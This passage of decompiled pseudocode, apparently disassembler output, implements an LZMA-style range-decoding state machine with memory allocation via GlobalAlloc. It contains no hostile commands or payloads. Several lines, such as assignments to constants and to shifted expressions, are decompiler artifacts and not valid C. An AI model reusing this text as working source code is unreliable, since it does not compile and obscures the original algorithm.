						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
